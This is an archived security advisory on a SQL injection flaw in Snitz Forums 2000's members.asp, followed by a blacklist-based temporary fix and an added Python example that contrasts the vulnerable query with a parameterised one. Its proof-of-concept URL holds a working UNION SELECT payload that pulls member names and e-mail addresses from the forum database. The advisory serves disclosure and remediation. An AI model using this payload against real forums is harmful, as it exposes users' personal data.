vulnerable
----------

Product        : Snitz Forums 2000
Version        : 3.3 3.3.01 3.3.02 3.3.03 (last stable version)
Object         : members.asp
Class          : Input validation error (remote SQL query manipulation vulnerability)
Vendor-URL     : http://forum.snitz.com/
Vendor-Status  : informed, not patched
Remote-Exploit : yes

Introduction
------------

Snitz Forums 2000 is open source ASP-based web forum software. It runs on Microsoft Windows operating systems.

A vulnerability exists in Snitz Forums 2000 which makes it possible for a malicious user to remotely manipulate the logic of SQL queries. As a result, it may be possible for attackers to view all data in the forum's database. This vulnerability can be exploited with a web browser.

More Details
------------

In the members.asp page, when listing members that match a search criterion, the input (M_NAME) is not checked for malicious content before it is placed into the SQL query. As a result, an attacker can append an extra SELECT statement to the query with UNION and view any data in the forum's database.

Proof-of-concept
----------------

Normally, to view the list of members whose member name starts with 'A', the members.asp page is called as follows:

    /members.asp?mode=search&M_NAME=A&initial=1&method=

Use this link to view the vulnerability:

    /members.asp?mode=search&M_NAME=XXXX%25')%20UNION%20SELECT%20MEMBER_ID,%20M_STATUS,%20M_NAME%20%2B%20'/'%20%2B%20M_EMAIL%20%2B%20'/',%20M_LEVEL,%20M_EMAIL,%20M_COUNTRY,%20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,%20M_AIM,%20M_TITLE,%20M_POSTS,%20M_LASTPOSTDATE,%20M_LASTHEREDATE,%20M_DATE,%20M_STATE%20FROM%20FORUM_MEMBERS%20WHERE%20(M_NAME%20LIKE%20'&initial=1&method=

The MEMBERNAME column will then show MEMBERNAME/EMAIL/ for each row.
Temporary fix
-------------

To fix this bug, in members.asp, change the following lines:

    SearchName = Request("M_NAME")
    if SearchName = "" then
        SearchName = Request.Form("M_NAME")
    end if

with:

    ' Only accept the search name once it has passed the character check
    if IsValidString(Request("M_NAME")) then
        SearchName = Request("M_NAME")
    end if
    if SearchName = "" then
        if IsValidString(Request.Form("M_NAME")) then
            SearchName = Request.Form("M_NAME")
        end if
    end if

and in the function IsValidString(sValidate) in inc_functions.asp, change the following line:

    sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<"

with:

    ' The single quote is added so that the string delimiter of the SQL query cannot be closed
    sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<'"
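The following is an added example, not code from the advisory or from Snitz Forums 2000: a Python mirror of the IsValidString blacklist before and after the fix, the vulnerable string-concatenated LIKE query as reconstructed from the PoC, and a parameterised query as the proper fix. The FORUM_MEMBERS table, its rows and the shortened UNION payload are all constructed for the example.

```python
import sqlite3

# Blacklist from inc_functions.asp IsValidString; the advisory's fix appends the single quote.
INVALID_CHARS_BEFORE = "!#$%^&*()=+{}[]|\\;:/?>,<"
INVALID_CHARS_AFTER = INVALID_CHARS_BEFORE + "'"

# Constructed payload in the shape of the advisory's PoC, reduced to two columns.
UNION_PAYLOAD = "XXXX%') UNION SELECT MEMBER_ID, M_EMAIL FROM FORUM_MEMBERS WHERE (M_NAME LIKE '"


def is_valid_string(value, invalid_chars=INVALID_CHARS_AFTER):
    """Mirror of the ASP IsValidString check: True only if no listed character occurs."""
    return not any(ch in invalid_chars for ch in value)


def build_query_vulnerable(search_name):
    """Reconstruction of the flaw: the M_NAME value is spliced straight into the SQL text."""
    return ("SELECT MEMBER_ID, M_NAME FROM FORUM_MEMBERS "
            "WHERE (M_NAME LIKE '" + search_name + "%')")


def make_forum_db():
    """Constructed in-memory stand-in for the forum's FORUM_MEMBERS table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE FORUM_MEMBERS (MEMBER_ID INTEGER, M_NAME TEXT, M_EMAIL TEXT)")
    conn.executemany("INSERT INTO FORUM_MEMBERS VALUES (?, ?, ?)",
                     [(1, "Alice", "alice@example.invalid"),
                      (2, "Bob", "bob@example.invalid"),
                      (3, "O'Brien", "obrien@example.invalid")])
    return conn


def search_members_vulnerable(conn, search_name):
    """Runs the concatenated query; a UNION payload makes it return the e-mail column."""
    return conn.execute(build_query_vulnerable(search_name)).fetchall()


def search_members_parameterised(conn, search_name):
    """Hardened form: the input is bound as data, so a quote or keyword cannot alter the query."""
    return conn.execute(
        "SELECT MEMBER_ID, M_NAME FROM FORUM_MEMBERS WHERE M_NAME LIKE ?",
        (search_name + "%",)).fetchall()
```

Note that the pre-fix blacklist already contains `%`, `(` and `,`, so the PoC string fails IsValidString once the check is actually called on M_NAME; the added `'` also rejects legitimate names such as O'Brien, which the parameterised query handles without any blacklist.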
This archive was generated by hypermail 2b30 : Fri Apr 19 2002 - 16:21:12 PDT